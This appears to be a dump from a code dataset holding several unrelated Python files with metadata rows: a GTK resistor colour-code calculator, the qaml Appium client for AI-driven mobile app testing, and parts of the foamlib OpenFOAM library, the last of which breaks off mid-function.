self.drop_down_4.set_selected(6)
self.calculate()
self.copy_button.connect('clicked', self.copy_text)
def copy_text(self, _button):
self.clipboard.set(self.result_label.get_label())
def on_selected_item(self, _drop_down, _selected_item):
selected_item = _drop_down.get_selected_item()
self.calculate()
def calculate(self):
value1 = decimal.Decimal(self.drop_down_1.get_selected_item().key)
value2 = decimal.Decimal(self.drop_down_2.get_selected_item().key)
multiplier = decimal.Decimal(self.drop_down_3.get_selected_item().key)
tolerance = self.drop_down_4.get_selected_item().key
value = (value1*10 + value2) * decimal.Decimal('10') ** multiplier
print(value)
print(convert_to_MKG(value))
# × U+00D7
value_str = f'{value1*10 + value2} × 10^{multiplier}Ω ±{tolerance}%'
print(value_str)
value_display = f'{convert_to_MKG(value)}Ω ±{tolerance}%'
        self.result_label.set_label(value_display)
def convert_to_MKG(value):
if value < 1000:
return delete_zero(value)
elif value < 1000000:
return delete_zero(value/1000) + 'K'
elif value < 1000000000:
return delete_zero(value/1000000) + 'M'
elif value < 1000000000000:
return delete_zero(value/1000000000) + 'G'
def delete_zero(value):
if value % decimal.Decimal('1') == 0: # the value has .0
return str(int(value))
elif value % decimal.Decimal('0.1') == 0:
return str(value.quantize(decimal.Decimal('1.0')))
elif value % decimal.Decimal('0.01') == 0:
return str(value.quantize(decimal.Decimal('1.00')))
elif value % decimal.Decimal('0.001') == 0:
return str(value.quantize(decimal.Decimal('1.000')))
else:
return str(value)
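# Worked example (illustrative): digits Brown (1) and Black (0) with a Red (2)
# multiplier give (1*10 + 0) * 10**2 = 1000 Ω, which convert_to_MKG() renders
# as '1K'; with a Gold tolerance band the displayed label is '1KΩ ±5%'.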
class KeyValuePair(GObject.Object):
key = GObject.Property(
type=str,
flags=GObject.ParamFlags.READWRITE,
)
value = GObject.Property(
type=str,
nick='Value',
blurb='Value',
flags=GObject.ParamFlags.READWRITE,
default='',
)
| 6,894 | Python | .py | 155 | 35.341935 | 80 | 0.599494 | oyajun/color-code | 8 | 7 | 3 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,130 | main.py | oyajun_color-code/src/main.py | # main.py
#
# Copyright 2024 oyajun
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# SPDX-License-Identifier: GPL-3.0-or-later
import sys
import gi
gi.require_version('Gtk', '4.0')
gi.require_version('Adw', '1')
from gi.repository import Gtk, Gio, Adw
from .window import ColorCodeWindow
from gettext import gettext
class ColorCodeApplication(Adw.Application):
"""The main application singleton class."""
def __init__(self):
super().__init__(application_id='com.oyajun.ColorCode',
flags=Gio.ApplicationFlags.DEFAULT_FLAGS)
self.create_action('quit', lambda *_: self.quit(), ['<primary>q'])
self.create_action('about', self.on_about_action)
self.create_action('preferences', self.on_preferences_action)
def do_activate(self):
"""Called when the application is activated.
We raise the application's main window, creating it if
necessary.
"""
win = self.props.active_window
if not win:
win = ColorCodeWindow(application=self)
win.present()
def on_about_action(self, widget, _unused):
"""Callback for the app.about action."""
about = Adw.AboutWindow(transient_for=self.props.active_window,
application_name= _('Color Code'),
application_icon='com.oyajun.ColorCode',
developer_name='oyajun',
version='0.1.4',
developers=['oyajun','Alex K','FineFindus','Mr-TBNR-BliTzz'],
license_type=Gtk.License.GPL_3_0,
                                # Translator Credits: Add your name.
# Example)
# oyajun <[email protected]>\n
# joe <[email protected]>
translator_credits=_('translator_credits'),
copyright='© 2024 oyajun')
about.present()
def on_preferences_action(self, widget, _):
"""Callback for the app.preferences action."""
print('app.preferences action activated')
def create_action(self, name, callback, shortcuts=None):
"""Add an application action.
Args:
name: the name of the action
callback: the function to be called when the action is
activated
shortcuts: an optional list of accelerators
"""
action = Gio.SimpleAction.new(name, None)
action.connect("activate", callback)
self.add_action(action)
if shortcuts:
self.set_accels_for_action(f"app.{name}", shortcuts)
def main(version):
"""The application's entry point."""
app = ColorCodeApplication()
return app.run(sys.argv)
| 3,445 | Python | .py | 78 | 33.961538 | 93 | 0.612172 | oyajun/color-code | 8 | 7 | 3 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,131 | client.py | qaml-ai_qaml-python/qaml/client.py | from appium import webdriver
from appium.options.ios import XCUITestOptions
from appium.options.android import UiAutomator2Options
from appium.webdriver.common.appiumby import AppiumBy
import re
import time
import base64
import subprocess
import json
from PIL import Image
from io import BytesIO
import requests
import os
import xml.etree.ElementTree as ET
class QAMLExecException(Exception):
pass
class BaseClient:
def __init__(self, api_key, api_base_url="https://api.camelqa.com"):
self.api_key = api_key or os.environ.get("QAML_API_KEY")
self.api_base_url = os.environ.get("QAML_API_BASE_URL", api_base_url)
self.driver = None
self.platform = None
self.screen_size = None
self.use_accessibility_elements = False
self.req_session = requests.Session()
self.req_session.headers.update({"Authorization": f"Bearer {api_key}"})
self.system_prompt = None
self.available_functions = {
"tap": self.tap_coordinates,
"drag": self.drag,
"swipe": self.swipe,
"scroll": self.scroll,
"type_text": self.type_text,
"sleep": self.sleep,
"report_error": self.report_error
}
def setup_driver(self):
raise NotImplementedError
def tap_coordinates(self, x, y):
raise NotImplementedError
def drag(self, startX, startY, endX, endY):
raise NotImplementedError
def swipe(self, direction):
raise NotImplementedError
def scroll(self, direction):
raise NotImplementedError
def type_text(self, text):
raise NotImplementedError
def sleep(self, duration):
time.sleep(duration)
def report_error(self, reason):
raise QAMLExecException(reason)
def get_screenshot(self):
screenshot = self.driver.get_screenshot_as_base64()
PIL_image = Image.open(BytesIO(base64.b64decode(screenshot)))
longer_side = max(PIL_image.size)
aspect_ratio = PIL_image.size[0] / PIL_image.size[1]
new_size = (960, int(960 / aspect_ratio)) if PIL_image.size[0] == longer_side else (int(960 * aspect_ratio), 960)
PIL_image = PIL_image.resize(new_size)
buffered = BytesIO()
PIL_image.save(buffered, format="PNG")
screenshot = base64.b64encode(buffered.getvalue()).decode("utf-8")
return screenshot
def _execute_function(self, function_name, **kwargs):
function = self.available_functions.get(function_name)
if function:
function(**kwargs)
def get_accessibility_elements(self, use_accessibility_elements=False):
if (not self.use_accessibility_elements and not use_accessibility_elements):
return []
appium_page_source = self.driver.page_source
root = ET.fromstring(appium_page_source)
accessibility_elements = root.findall(".//*[@accessible='true']")
accessibility_elements = [element for element in accessibility_elements if element.tag != "XCUIElementTypeStaticText" and element.tag != "android.widget.TextView" and element.tag != "XCUIElementTypeKey"]
accessibility_elements = [{"left": int(element.attrib["x"]), "top": int(element.attrib["y"]), "width": int(element.attrib["width"]), "height": int(element.attrib["height"]), "type": element.attrib["type"], "label": element.attrib.get("label", "")} for element in accessibility_elements]
# remove elements with no label
accessibility_elements = [element for element in accessibility_elements if element["label"] and element["label"].strip()]
return accessibility_elements
def execute(self, script):
if not script.strip():
return
screenshot = self.get_screenshot()
accessibility_elements = self.get_accessibility_elements()
payload = {"action": script, "screen_size": self.screen_size, "screenshot": screenshot, "platform": self.platform, "extra_context": self.system_prompt, "accessibility_elements": accessibility_elements}
response = self.req_session.post(f"{self.api_base_url}/v1/execute", json=payload, headers={"Authorization": f"Bearer {self.api_key}"})
print(f"Action: {script} - Response: {response.text}")
try:
actions = response.json()
for action in actions:
self._execute_function(action["name"], **json.loads(action["arguments"]))
time.sleep(0.5)
except Exception as e:
print(e)
pass
def assert_condition(self, script):
screenshot = self.get_screenshot()
payload = {"assertion": script, "screen_size": self.screen_size, "screenshot": screenshot, "platform": self.platform, "extra_context": self.system_prompt}
response = self.req_session.post(f"{self.api_base_url}/v1/assert", json=payload, headers={"Authorization": f"Bearer {self.api_key}"})
print(f"Action: {script} - Response: {response.text}")
assertion = response.json()[0]
args = json.loads(assertion["arguments"])
if args.get("result") == False:
raise QAMLExecException(f"Assertion failed: {script}. Reason: {args['reason']}")
return response.json()
def task(self, task, max_steps=10):
progress = []
iterations = 0
yield f"Task: {task}"
while True:
if iterations >= max_steps:
raise QAMLExecException(f"Task execution took too many steps. Max steps: {max_steps}")
iterations += 1
time.sleep(0.5)
screenshot = self.get_screenshot()
accessibility_elements = self.get_accessibility_elements()
payload = {"task": task, "progress": progress, "platform": self.platform, "screenshot": screenshot, "extra_context": self.system_prompt, "screen_size": self.screen_size, "accessibility_elements": accessibility_elements}
response = self.req_session.post(f"{self.api_base_url}/v1/execute-task", json=payload)
response_json = response.json()
function_called = False
completed = False
for function in response_json:
args = json.loads(function["arguments"])
if function["name"] == "update_progress":
yield f"Progress: {args['progress']}"
progress.append(args["progress"])
continue
if function["name"] == "task_completed":
if args["result"] == "success":
completed = True
else:
raise QAMLExecException(f"Task execution failed. Progress: {progress}")
function_called = True
self._execute_function(function["name"], **args)
yield f"{function['name']}({args})"
progress.append(f'{function["name"]}({args})')
if completed:
break
if not function_called:
pass
#raise QAMLExecException("Task execution failed. No function called.")
class AndroidClient(BaseClient):
def __init__(self, api_key, driver=None):
super().__init__(api_key)
self.platform = "Android"
if driver:
self.driver = driver
else:
max_retry = 3
for i in range(max_retry):
try:
self.setup_driver()
break
except Exception as e:
if i == max_retry - 1:
raise e
self.screen_size = self.driver.get_window_size()
def setup_driver(self):
caps = {'deviceName': 'Android Device', 'automationName': 'UiAutomator2', 'autoGrantPermissions': True,
'newCommandTimeout': 600, 'mjpegScreenshotUrl': "http://localhost:4723/stream.mjpeg"}
options = UiAutomator2Options().load_capabilities(caps)
def create_driver(options):
try:
return webdriver.Remote('http://localhost:4723', options=options)
except:
return webdriver.Remote('http://localhost:4723/wd/hub', options=options)
try:
self.driver = webdriver.Remote('http://localhost:4723', options=options)
except:
# Try again without mjpeg-consumer dependency
caps.pop('mjpegScreenshotUrl')
options = UiAutomator2Options().load_capabilities(caps)
self.driver = create_driver(options)
self.driver.start_recording_screen()
self.driver.update_settings({'waitForIdleTimeout': 0, 'shouldWaitForQuiescence': False, 'maxTypingFrequency': 60})
# get screenshot to test if the driver is working
self.driver.get_screenshot_as_base64()
def tap_coordinates(self, x, y):
self.driver.tap([(x, y)], 1)
def drag(self, startX, startY, endX, endY):
self.driver.swipe(startX, startY, endX, endY, 1)
def swipe(self, direction):
        left = self.screen_size["width"] * 0.2
        top = self.screen_size["height"] * 0.2
        width = self.screen_size["width"] * 0.6
        height = self.screen_size["height"] * 0.6
self.driver.execute_script("mobile: swipeGesture", {"left": left, "top": top, "width": width, "height": height, "direction": direction, "percent": 1.0})
def scroll(self, direction):
direction_map = {"up": "down", "down": "up", "left": "right", "right": "left"}
self.swipe(direction_map[direction])
def type_text(self, text):
self.driver.execute_script("mobile: shell", {"command": f"input text '{text}'"})
class IOSClient(BaseClient):
def __init__(self, api_key, driver=None, use_mjpeg=True, udid=None):
super().__init__(api_key)
self.available_functions["switch_to_app"] = self.switch_to_app
self.platform = "iOS"
self.use_mjpeg = use_mjpeg
        self.udid = udid
        self.use_hid_typing = False  # the Client() factory may override this
if driver:
self.driver = driver
else:
def get_ios_udid():
if udid:
return udid
system_profiler_output = subprocess.run(["system_profiler", "SPUSBDataType"], capture_output=True, text=True).stdout
serial_numbers = re.findall(r'(iPhone|iPad).*?Serial Number: *([^\n]+)', system_profiler_output, re.DOTALL)
if serial_numbers:
first_serial_number = serial_numbers[0][1].strip()
modified_serial_number = first_serial_number[:8] + '-' + first_serial_number[8:]
return modified_serial_number
ios_udid = get_ios_udid()
# try 3 times to setup the driver
for _ in range(3):
try:
self.setup_driver(ios_udid)
break
except:
pass
else:
raise Exception("Failed to setup the driver.")
self.screen_size = self.driver.get_window_size()
def setup_driver(self, udid):
options = XCUITestOptions()
if udid:
options.udid = udid
options.new_command_timeout = 60 * 5 # 5 minutes
if self.use_mjpeg:
custom_caps = {"mjpegScreenshotUrl": "http://localhost:9100"}
options.load_capabilities(custom_caps)
def create_driver(options):
try:
return webdriver.Remote('http://localhost:4723', options=options)
except:
return webdriver.Remote('http://localhost:4723/wd/hub', options=options)
try:
self.driver = create_driver(options)
except:
# Try again without mjpeg-consumer dependency
options = XCUITestOptions()
options.udid = udid
self.driver = create_driver(options)
if self.use_mjpeg:
print("Using MJPEG screenshot.")
self.driver.start_recording_screen(forceRestart=True)
self.driver.update_settings({'waitForIdleTimeout': 0, 'shouldWaitForQuiescence': False, 'maxTypingFrequency': 60})
# get screenshot to test if the driver is working
self.driver.get_screenshot_as_base64()
def tap_coordinates(self, x, y):
self.driver.execute_script("mobile: tap", {"x": x, "y": y})
def drag(self, startX, startY, endX, endY):
self.driver.execute_script("mobile: dragFromToForDuration", {"fromX": startX, "fromY": startY, "toX": endX, "toY": endY, "duration": 1})
def swipe(self, direction):
self.driver.execute_script("mobile: swipe", {"direction": direction})
def scroll(self, direction):
direction_map = {"up": "down", "down": "up", "left": "right", "right": "left"}
self.driver.execute_script("mobile: swipe", {"direction": direction_map[direction]})
def type_text(self, text):
if self.use_hid_typing:
self.type_text_hid(text)
else:
try:
self.driver.find_element(AppiumBy.IOS_PREDICATE, "type == 'XCUIElementTypeApplication'").send_keys(text)
except:
self.type_text_hid(text)
def type_text_hid(self, text):
special_chars = {
' ': 0x2C, '!': 0x1E, '@': 0x1F, '#': 0x20, '$': 0x21, '%': 0x22,
'^': 0x23, '&': 0x24, '*': 0x25, '(': 0x26, ')': 0x27, '-': 0x2D,
'_': 0x2D, '=': 0x2E, '+': 0x2E, '[': 0x2F, '{': 0x2F, ']': 0x30,
'}': 0x30, '\\': 0x31, '|': 0x31, ';': 0x33, ':': 0x33, '\'': 0x34,
'"': 0x34, '`': 0x35, '~': 0x35, ',': 0x36, '<': 0x36, '.': 0x37,
'>': 0x37, '/': 0x38, '?': 0x38
}
# Base HID usage codes
hid_base_lower = 0x04 # HID usage for 'a'
hid_base_upper = 0x04 # HID usage for 'A'
hid_base_number = 0x1E # HID usage for '1'
for char in text:
usage = None
shift = False
if 'a' <= char <= 'z':
usage = hid_base_lower + (ord(char) - ord('a'))
elif 'A' <= char <= 'Z':
usage = hid_base_upper + (ord(char) - ord('A'))
shift = True
elif '1' <= char <= '9':
usage = hid_base_number + (ord(char) - ord('1'))
elif char == '0':
usage = 0x27
elif char in special_chars:
usage = special_chars[char]
# Determine if shift needs to be pressed for special characters
shift = char in '~!@#$%^&*()_+{}|:"<>?'
if usage is None:
continue
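            # Note: `shift` is determined above, but no modifier key event
            # (e.g. HID usage 0xE1 for left shift) is sent below, so shifted
            # characters may be emitted unshifted.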
self.driver.execute_script("mobile: performIoHidEvent", {"page": 0x07, "usage": usage, "durationSeconds": 0.005}) # Key down
self.driver.execute_script("mobile: performIoHidEvent", {"page": 0x07, "usage": 0x00, "durationSeconds": 0.005}) # Key up
def switch_to_app(self, bundle_id):
self.driver.activate_app(bundle_id)
def Client(api_key, driver=None, use_mjpeg=True, use_hid_typing=False, use_accessibility_elements=False, udid=None):
def get_connected_android_devices():
try:
result = subprocess.run(["adb", "devices"], capture_output=True, text=True)
devices = result.stdout.splitlines()[1:] # Skip the first line, which is a header
connected_devices = [line.split('\t')[0] for line in devices if "device" in line]
return connected_devices
except:
return []
if driver is not None:
platform_name = driver.capabilities.get("platformName").lower()
if platform_name == 'android':
print("Using the provided Appium driver for Android.")
client = AndroidClient(api_key, driver=driver)
client.use_accessibility_elements = use_accessibility_elements
return client
elif platform_name == 'ios':
print("Using the provided Appium driver for iOS.")
client = IOSClient(api_key, driver=driver)
client.use_accessibility_elements = use_accessibility_elements
client.use_hid_typing = use_hid_typing
return client
else:
raise Exception("Unsupported platform specified in the provided driver's capabilities.")
android_devices = get_connected_android_devices()
if android_devices:
client = AndroidClient(api_key)
client.use_accessibility_elements = use_accessibility_elements
return client
try:
client = IOSClient(api_key, use_mjpeg=use_mjpeg, udid=udid)
client.use_accessibility_elements = use_accessibility_elements
client.use_hid_typing = use_hid_typing
return client
except:
raise Exception("No connected devices found or driver provided.")
| 16,834 | Python | .py | 335 | 39.256716 | 294 | 0.600389 | qaml-ai/qaml-python | 8 | 0 | 1 | AGPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,132 | __main__.py | qaml-ai_qaml-python/qaml/__main__.py | import qaml
import sys
import os
import readline
def main():
# get api key from environment variable
api_key = os.environ.get("QAML_API_KEY")
use_mjpeg = os.environ.get("QAML_USE_MJPEG", "true").lower() == "true"
if api_key is None:
print("Please set the QAML_API_KEY environment variable")
sys.exit(1)
print("Initializing device driver...")
client = qaml.Client(api_key=api_key, use_mjpeg=use_mjpeg)
# if no args, start repl
if len(sys.argv) == 1:
while True:
try:
command = input("Enter a command: ")
client.execute(command)
except EOFError:
print("")
break
except Exception as e:
print(f"Error: {e}")
else:
args_str = " ".join(sys.argv[1:])
print(f"Running command: {args_str}")
client.execute(args_str)
if __name__ == "__main__":
main()
| 948 | Python | .py | 30 | 23.7 | 74 | 0.567213 | qaml-ai/qaml-python | 8 | 0 | 1 | AGPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,133 | cli_agent.py | qaml-ai_qaml-python/qaml/cli_agent.py | import qaml
import sys
import os
import readline
def main():
# get api key from environment variable
api_key = os.environ.get("QAML_API_KEY")
use_mjpeg = os.environ.get("QAML_USE_MJPEG", "true").lower() == "true"
if api_key is None:
print("Please set the QAML_API_KEY environment variable")
sys.exit(1)
print("Initializing device driver...")
client = qaml.Client(api_key=api_key, use_mjpeg=use_mjpeg)
# if no args, start repl
if len(sys.argv) == 1:
while True:
try:
task = input("Enter a task: ")
for action in client.task(task):
print(action)
except EOFError:
print("")
break
except Exception as e:
print(f"Error: {e}")
else:
args_str = " ".join(sys.argv[1:])
print(f"Running task: {args_str}")
for action in client.task(args_str):
print(action)
| 981 | Python | .py | 30 | 23.9 | 74 | 0.559536 | qaml-ai/qaml-python | 8 | 0 | 1 | AGPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,134 | conf.py | gerlero_foamlib/docs/conf.py | # Configuration file for the Sphinx documentation builder.
#
# For the full list of built-in configuration values, see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Project information -----------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
project = "foamlib"
copyright = "2024, Gabriel S. Gerlero"
author = "Gabriel S. Gerlero"
# -- General configuration ---------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration
extensions = ["sphinx.ext.autodoc"]
templates_path = ["_templates"]
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# -- Options for HTML output -------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output
html_theme = "sphinx_rtd_theme"
html_static_path = ["_static"]
| 981 | Python | .py | 18 | 53.055556 | 87 | 0.643979 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,135 | __init__.py | gerlero_foamlib/foamlib/__init__.py | """A Python interface for interacting with OpenFOAM."""
__version__ = "0.6.10"
from ._cases import (
AsyncFoamCase,
AsyncSlurmFoamCase,
CalledProcessError,
FoamCase,
FoamCaseBase,
FoamCaseRunBase,
)
from ._files import FoamFieldFile, FoamFile, FoamFileBase
__all__ = [
"AsyncFoamCase",
"AsyncSlurmFoamCase",
"CalledProcessError",
"FoamFile",
"FoamCase",
"FoamCaseBase",
"FoamCaseRunBase",
"FoamFieldFile",
"FoamFileBase",
]
| 487 | Python | .py | 22 | 18.272727 | 57 | 0.692641 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,136 | _subprocess.py | gerlero_foamlib/foamlib/_cases/_subprocess.py | import asyncio
import subprocess
import sys
from io import BytesIO
from typing import IO, TYPE_CHECKING, Optional, Union
if TYPE_CHECKING:
import os
if sys.version_info >= (3, 9):
from collections.abc import Mapping, Sequence
else:
from typing import Mapping, Sequence
CompletedProcess = subprocess.CompletedProcess
class CalledProcessError(subprocess.CalledProcessError):
def __str__(self) -> str:
if self.stderr:
if isinstance(self.stderr, bytes):
return super().__str__() + "\n" + self.stderr.decode()
if isinstance(self.stderr, str):
return super().__str__() + "\n" + self.stderr
return super().__str__()
DEVNULL = subprocess.DEVNULL
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
def run_sync(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
check: bool = True,
cwd: Optional["os.PathLike[str]"] = None,
env: Optional[Mapping[str, str]] = None,
stdout: Optional[Union[int, IO[bytes]]] = None,
stderr: Optional[Union[int, IO[bytes]]] = None,
) -> "CompletedProcess[bytes]":
if not isinstance(cmd, str) and sys.version_info < (3, 8):
cmd = [str(arg) for arg in cmd]
proc = subprocess.Popen(
cmd,
cwd=cwd,
env=env,
stdout=stdout,
stderr=PIPE,
shell=isinstance(cmd, str),
)
if stderr == STDOUT:
stderr = stdout
if stderr not in (PIPE, DEVNULL):
stderr_copy = BytesIO()
assert not isinstance(stderr, int)
if stderr is None:
stderr = sys.stderr.buffer
assert proc.stderr is not None
for line in proc.stderr:
stderr.write(line)
stderr_copy.write(line)
output, _ = proc.communicate()
assert not _
error = stderr_copy.getvalue()
else:
output, error = proc.communicate()
assert proc.returncode is not None
if check and proc.returncode != 0:
raise CalledProcessError(
returncode=proc.returncode,
cmd=cmd,
output=output,
stderr=error,
)
return CompletedProcess(
cmd, returncode=proc.returncode, stdout=output, stderr=error
)
async def run_async(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
check: bool = True,
cwd: Optional["os.PathLike[str]"] = None,
env: Optional[Mapping[str, str]] = None,
stdout: Optional[Union[int, IO[bytes]]] = None,
stderr: Optional[Union[int, IO[bytes]]] = None,
) -> "CompletedProcess[bytes]":
if isinstance(cmd, str):
proc = await asyncio.create_subprocess_shell(
cmd,
cwd=cwd,
env=env,
stdout=stdout,
stderr=PIPE,
)
else:
if sys.version_info < (3, 8):
cmd = [str(arg) for arg in cmd]
proc = await asyncio.create_subprocess_exec(
*cmd,
cwd=cwd,
env=env,
stdout=stdout,
stderr=PIPE,
)
if stderr == STDOUT:
stderr = stdout
if stderr not in (PIPE, DEVNULL):
stderr_copy = BytesIO()
assert not isinstance(stderr, int)
if stderr is None:
stderr = sys.stderr.buffer
assert proc.stderr is not None
async for line in proc.stderr:
stderr.write(line)
stderr_copy.write(line)
output, _ = await proc.communicate()
assert not _
error = stderr_copy.getvalue()
else:
output, error = await proc.communicate()
assert proc.returncode is not None
if check and proc.returncode != 0:
raise CalledProcessError(
returncode=proc.returncode,
cmd=cmd,
output=output,
stderr=error,
)
return CompletedProcess(
cmd, returncode=proc.returncode, stdout=output, stderr=error
)
| 3,952 | Python | .py | 123 | 24.211382 | 70 | 0.599947 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,137 | _run.py | gerlero_foamlib/foamlib/_cases/_run.py | import os
import shlex
import shutil
import sys
import tempfile
from abc import abstractmethod
from contextlib import contextmanager
from pathlib import Path
from typing import (
IO,
Any,
Optional,
Tuple,
Union,
)
if sys.version_info >= (3, 9):
from collections.abc import (
Callable,
Collection,
Coroutine,
Generator,
Mapping,
Sequence,
Set,
)
else:
from typing import AbstractSet as Set
from typing import (
Callable,
Collection,
Coroutine,
Generator,
Mapping,
Sequence,
)
if sys.version_info >= (3, 11):
from typing import Self
else:
from typing_extensions import Self
from .._files import FoamFieldFile
from ._base import FoamCaseBase
from ._subprocess import DEVNULL, STDOUT
class FoamCaseRunBase(FoamCaseBase):
class TimeDirectory(FoamCaseBase.TimeDirectory):
@abstractmethod
def cell_centers(
self,
) -> Union[FoamFieldFile, Coroutine[None, None, FoamFieldFile]]:
raise NotImplementedError
@property
@abstractmethod
def _case(self) -> "FoamCaseRunBase":
raise NotImplementedError
def _cell_centers_calls(self) -> Generator[Any, None, FoamFieldFile]:
ret = self["C"]
if ret not in self:
yield self._case.run(
["postProcess", "-func", "writeCellCentres", "-time", self.name],
cpus=0,
log=False,
)
return ret
def __delitem__(self, key: Union[int, float, str]) -> None:
shutil.rmtree(self[key].path)
@staticmethod
@abstractmethod
def _run(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
cpus: int,
**kwargs: Any,
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@staticmethod
@abstractmethod
def _rmtree(
path: Union["os.PathLike[str]", str], *, ignore_errors: bool = False
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@staticmethod
@abstractmethod
def _copytree(
src: Union["os.PathLike[str]", str],
dest: Union["os.PathLike[str]", str],
*,
symlinks: bool = False,
ignore: Optional[
Callable[[Union["os.PathLike[str]", str], Collection[str]], Collection[str]]
] = None,
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def clean(self, *, check: bool = False) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def copy(self, dst: Optional[Union["os.PathLike[str]", str]] = None) -> Any:
raise NotImplementedError
@abstractmethod
def clone(self, dst: Optional[Union["os.PathLike[str]", str]] = None) -> Any:
raise NotImplementedError
@abstractmethod
def _prepare(
self, *, check: bool = True, log: bool = True
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def run(
self,
cmd: Optional[Union[Sequence[Union[str, "os.PathLike[str]"]], str]] = None,
*,
parallel: Optional[bool] = None,
cpus: Optional[int] = None,
check: bool = True,
log: bool = True,
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def block_mesh(
self, *, check: bool = True, log: bool = True
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def decompose_par(
self, *, check: bool = True, log: bool = True
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def reconstruct_par(
self, *, check: bool = True, log: bool = True
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def restore_0_dir(self) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
def __clean_paths(self) -> Set[Path]:
has_decompose_par_dict = (self.path / "system" / "decomposeParDict").is_file()
has_block_mesh_dict = (self.path / "system" / "blockMeshDict").is_file()
paths = set()
for p in self.path.iterdir():
if p.is_dir():
try:
t = float(p.name)
except ValueError:
pass
else:
if t != 0:
paths.add(p)
if has_decompose_par_dict and p.name.startswith("processor"):
paths.add(p)
if (self.path / "0.orig").is_dir() and (self.path / "0").is_dir():
paths.add(self.path / "0")
if has_block_mesh_dict and (self.path / "constant" / "polyMesh").exists():
paths.add(self.path / "constant" / "polyMesh")
paths.update(self.path.glob("log.*"))
return paths
def __clone_ignore(
self,
) -> Callable[[Union["os.PathLike[str]", str], Collection[str]], Collection[str]]:
clean_paths = self.__clean_paths()
def ignore(
path: Union["os.PathLike[str]", str], names: Collection[str]
) -> Collection[str]:
paths = {Path(path) / name for name in names}
return {p.name for p in paths.intersection(clean_paths)}
return ignore
def __clean_script(self) -> Optional[Path]:
"""Return the path to the (All)clean script, or None if no clean script is found."""
clean = self.path / "clean"
all_clean = self.path / "Allclean"
if clean.is_file():
script = clean
elif all_clean.is_file():
script = all_clean
else:
return None
if sys.argv and Path(sys.argv[0]).absolute() == script.absolute():
return None
return script
def __prepare_script(self) -> Optional[Path]:
"""Return the path to the Allrun.pre script, or None if no prepare script is found."""
script = self.path / "Allrun.pre"
if not script.is_file():
return None
if sys.argv and Path(sys.argv[0]).absolute() == script.absolute():
return None
return script
def __run_script(self, *, parallel: Optional[bool]) -> Optional[Path]:
"""Return the path to the (All)run script, or None if no run script is found."""
run = self.path / "run"
run_parallel = self.path / "run-parallel"
all_run = self.path / "Allrun"
all_run_parallel = self.path / "Allrun-parallel"
if run.is_file() or all_run.is_file():
if run_parallel.is_file() or all_run_parallel.is_file():
if parallel:
script = (
run_parallel if run_parallel.is_file() else all_run_parallel
)
elif parallel is False:
script = run if run.is_file() else all_run
else:
raise ValueError(
"Both (All)run and (All)run-parallel scripts are present. Please specify parallel argument."
)
else:
script = run if run.is_file() else all_run
elif parallel is not False and (
run_parallel.is_file() or all_run_parallel.is_file()
):
script = run_parallel if run_parallel.is_file() else all_run_parallel
else:
return None
if sys.argv and Path(sys.argv[0]).absolute() == script.absolute():
return None
return script
def __env(self, *, shell: bool) -> Optional[Mapping[str, str]]:
sip_workaround = os.environ.get(
"FOAM_LD_LIBRARY_PATH", ""
) and not os.environ.get("DYLD_LIBRARY_PATH", "")
if not shell or sip_workaround:
env = os.environ.copy()
if not shell:
env["PWD"] = str(self.path)
if sip_workaround:
env["DYLD_LIBRARY_PATH"] = env["FOAM_LD_LIBRARY_PATH"]
return env
return None
@contextmanager
def __output(
self, cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str], *, log: bool
) -> Generator[Tuple[Union[int, IO[bytes]], Union[int, IO[bytes]]], None, None]:
if log:
if isinstance(cmd, str):
name = shlex.split(cmd)[0]
else:
name = Path(cmd[0]).name if isinstance(cmd[0], os.PathLike) else cmd[0]
with (self.path / f"log.{name}").open("ab") as stdout:
yield stdout, STDOUT
else:
yield DEVNULL, DEVNULL
def __mkrundir(self) -> Path:
d = Path(os.environ["FOAM_RUN"], "foamlib")
d.mkdir(parents=True, exist_ok=True)
ret = Path(tempfile.mkdtemp(prefix=f"{self.name}-", dir=d))
ret.rmdir()
return ret
def _copy_calls(
self, dst: Optional[Union["os.PathLike[str]", str]]
) -> Generator[Any, None, Self]:
if dst is None:
